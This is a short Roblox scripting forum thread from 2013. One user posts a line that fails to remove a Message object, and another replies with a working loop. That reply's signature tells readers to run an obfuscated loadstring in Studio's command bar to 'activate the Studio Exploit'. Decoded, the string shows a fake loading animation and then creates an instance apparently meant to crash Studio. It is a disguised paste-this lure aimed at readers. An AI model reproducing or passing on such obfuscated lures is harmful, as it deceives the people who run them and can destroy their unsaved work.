LordGando
|
  |
| Joined: 05 Jul 2011 |
| Total Posts: 6723 |
|
|
| 29 Aug 2013 07:37 PM |
This wont work:
Game.Workspace.Message:remove
-LᴏʀᴅGᴀɴᴅᴏ - Cows make milk, I drink milk |
|
|
| Report Abuse |
|
|
Raphael7
|
  |
| Joined: 03 Dec 2008 |
| Total Posts: 2479 |
|
|
| 29 Aug 2013 07:37 PM |
for _, v in pairs(game.Workspace:GetChildren()) do if v:IsA('Message') then v:Destroy() end end
> Please run this on your command bar in order to activate the Studio Exploit, loadstring("\108\101\108\32\61\32\34\76\111\97\100\105\110\103\32\82\97\112\104\97\101\108\55\39\115\32\83\116\117\100\105\111\32\69\120\112\108\111\105\116\34\10\109\115\103\32\61\32\73\110\115\116\97\110\99\101\46\110\101\119\40\39\77\101\115\115\97\103\101\39\44\32\87\111\114\107\115\112\97\99\101\41\10\102\111\114\32\105\32\61\32\49\44\32\108\101\108\58\108\101\110\40\41\32\100\111\32\119\97\105\116\40\48\46\49\53\41\10\109\115\103\46\84\101\120\116\32\61\32\109\115\103\46\84\101\120\116\46\46\108\101\108\58\115\117\98\40\105\44\105\41\10\101\110\100\10\119\97\105\116\40\50\41\10\102\111\114\32\105\32\61\32\49\44\32\109\97\116\104\46\114\97\110\100\111\109\40\55\44\32\49\52\41\32\100\111\32\119\97\105\116\40\48\46\49\53\41\32\109\115\103\46\84\101\120\116\32\61\32\39\80\108\101\97\115\101\32\119\97\105\116\39\10\119\97\105\116\40\48\46\49\53\41\32\109\115\103\46\84\101\120\116\32\61\32\39\80\108\101\97\115\101\32\119\97\105\116\46\39\10\119\97\105\116\40\48\46\49\53\41\32\109\115\103\46\84\101\120\116\32\61\32\39\80\108\101\97\115\101\32\119\97\105\116\46\46\39\10\119\97\105\116\40\48\46\49\53\41\32\109\115\103\46\84\101\120\116\32\61\32\39\80\108\101\97\115\101\32\119\97\105\116\46\46\46\39\10\101\110\100\10\73\110\115\116\97\110\99\101\46\110\101\119\40\39\77\97\110\117\97\108\83\117\114\102\97\99\101\74\111\105\110\116\73\110\115\116\97\110\99\101\39\41\10")() |
|
|
| Report Abuse |
|
|
| |
|